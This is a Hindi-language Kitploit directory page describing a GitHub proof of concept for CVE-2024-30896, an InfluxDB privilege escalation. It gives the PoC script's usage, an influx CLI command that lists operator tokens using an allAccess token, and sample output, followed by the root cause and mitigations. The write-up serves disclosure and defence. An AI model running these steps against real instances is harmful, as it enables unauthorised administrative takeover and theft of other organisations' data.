Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-30896 | Kitploit
उपकरण/GitHubGitHub/xenom0rph97/cve-2024-30896
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणक्लाउड सुरक्षाडेटाबेस सुरक्षा
GitHubxenom0rph97/cve-2024-30896

CVE-2024-30896

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-30896

सारांश

influxdb में एक व्यावसायिक तर्क दोष (business logic flaw) के कारण, जिन उपयोगकर्ताओं के पास मान्य allAccess टोकन होता है, वे वर्तमान प्राधिकरण टोकनों की सूची बनाकर अपने विशेषाधिकारों को operator स्तर तक बढ़ा सकते हैं।

परिदृश्य

हमलावर एक ऐसा उपयोगकर्ता हो सकता है जिसे किसी व्यवस्थापक द्वारा केवल उनके संगठन के भीतर allAccess टोकन के माध्यम से पहुंच प्रदान की गई हो। इस उपयोगकर्ता की अनुमतियाँ संगठन पर पूर्ण नियंत्रण की अनुमति देंगी, लेकिन फिर भी उसे अन्य संगठनों के साथ बातचीत करने से रोकेंगी।

प्रभाव

यह भेद्यता एक उपयोगकर्ता को influxdb इंस्टेंस तक अप्रतिबंधित पहुंच प्राप्त करने की अनुमति देगी। ऐसी ही स्थिति विभिन्न संगठनों के उपयोगकर्ताओं के स्वामित्व वाले डेटा की गोपनीयता, अखंडता और उपलब्धता से पूरी तरह समझौता कर सकती है। इसके अतिरिक्त, चूँकि operator टोकन में प्रशासनिक अनुमतियाँ होती हैं, पूरे influxdb इंस्टेंस की उपलब्धता और अखंडता से समझौता किया जा सकता है।

पूर्वापेक्षाएँ/सीमाएँ

  1. हमलावर के पास एक मान्य allAccess टोकन होना चाहिए
  2. allAccess टोकन उसी Org में बनाया गया होना चाहिए जहाँ एक operator टोकन मौजूद है (जैसे, Admin उपयोगकर्ता के समान Org)
  3. हमलावर को CLI या APIs (influxClient) के माध्यम से influxdb इंस्टेंस के साथ बातचीत करने में सक्षम होना चाहिए

पुनरुत्पादन के चरण

केस 1: influxdb APIs के माध्यम से शोषण:

स्क्रिप्ट उपयोग

root@kitploit:~
% python3 ./influxdbPrivescCVE_PoC.py -h
usage: influxdbPrivescCVE_PoC.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]] [-vv [VVERBOSE]]

optional arguments:
  -h, --help            show this help message and exit
  -t TOKEN, --token TOKEN
                        Custom or allAccess token to access influx DB instance
  -e ENDPOINTURL, --endpointUrl ENDPOINTURL
                        Endpoint Url of influxdb instance (ex. "https://myInfluxdbInstance:8086/")
  -v [VERBOSE], --verbose [VERBOSE]
                        Enable verbose logging - INFO
  -vv [VVERBOSE], --vverbose [VVERBOSE]
                        Enable verbose logging - DEBUG

केस 2: influx CLI के माध्यम से शोषण

  1. निष्पादित करें: influx auth ls -t <allAccessToken> | grep write:/orgs। यह influxdb इंस्टेंस पर सभी वर्तमान सक्रिय operator टोकनों की सूची देगा।

उदाहरण

root@kitploit:~
# Using an allAccess token 
influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}

0cc41c3b050e5000							U1OuqmFC{REDACTED}	
admin		0cb9c92ee228b000	[read:orgs/87d0746948a3b3f5/authorizations write:orgs/87d0746948a3b3f5/authorizations read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets read:orgs/87d0746948a3b3f5/dashboards write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5 read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000 read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents read:orgs/87d0746948a3b3f5/notificationRules write:orgs/87d0746948a3b3f5/notificationRules read:orgs/87d0746948a3b3f5/notificationEndpoints write:orgs/87d0746948a3b3f5/notificationEndpoints read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks read:orgs/87d0746948a3b3f5/annotations write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications write:orgs/87d0746948a3b3f5/replications]

# Listing all available tokens passing allAccess token and retrieving only operator level tokens
influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs

0cbb920e128e5000							gerKYLO0Ph_ibUk0y{REDACTED}
admin		0cb9c92ee228b000	[read:/authorizations write:/authorizations read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs write:/orgs read:/sources write:/sources read:/tasks write:/tasks read:/telegrafs write:/telegrafs read:/users write:/users read:/variables write:/variables read:/scrapers write:/scrapers read:/secrets write:/secrets read:/labels write:/labels read:/views write:/views read:/documents write:/documents read:/notificationRules write:/notificationRules read:/notificationEndpoints write:/notificationEndpoints read:/checks write:/checks read:/dbrp write:/dbrp read:/notebooks write:/notebooks read:/annotations write:/annotations read:/remotes write:/remotes read:/replications write:/replications]

मूल कारण

allAccess टोकनों में डिफ़ॉल्ट रूप से उसी Org में परिभाषित सभी प्राधिकरणों को सूचीबद्ध करने की अनुमतियाँ होती हैं, जिनमें प्रकार (custom, allAccess, operator) के आधार पर कोई प्रतिबंध नहीं होता -> read:orgs/87d0746948a3b3f5/authorizations।

अस्थायी शमन

चलाए जाने पर, influx setup पहला (डिफ़ॉल्ट) org बनाएगा, जिसमें एक operator टोकन स्वचालित रूप से संग्रहीत किया जाएगा। उपयोगकर्ताओं को केवल द्वितीयक रूप से बनाए गए संगठनों तक पहुंच प्रदान की जानी चाहिए। यह अनुशंसा की जाती है कि कई संगठन बनाए जाएँ और उपयोगकर्ताओं को केवल वे संगठन दिए जाएँ जिनमें operator टोकन नहीं है।

अनुशंसाएँ

  • ऐसा कोई भी संगठन साझा न करें जिसमें operator टोकन हो
  • गैर-डिफ़ॉल्ट orgs में operator टोकन संग्रहीत करने से बचें

CVSS आधार स्कोर: 9.1

CVSS v3.1 वेक्टर: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

टूल डाउनलोड करें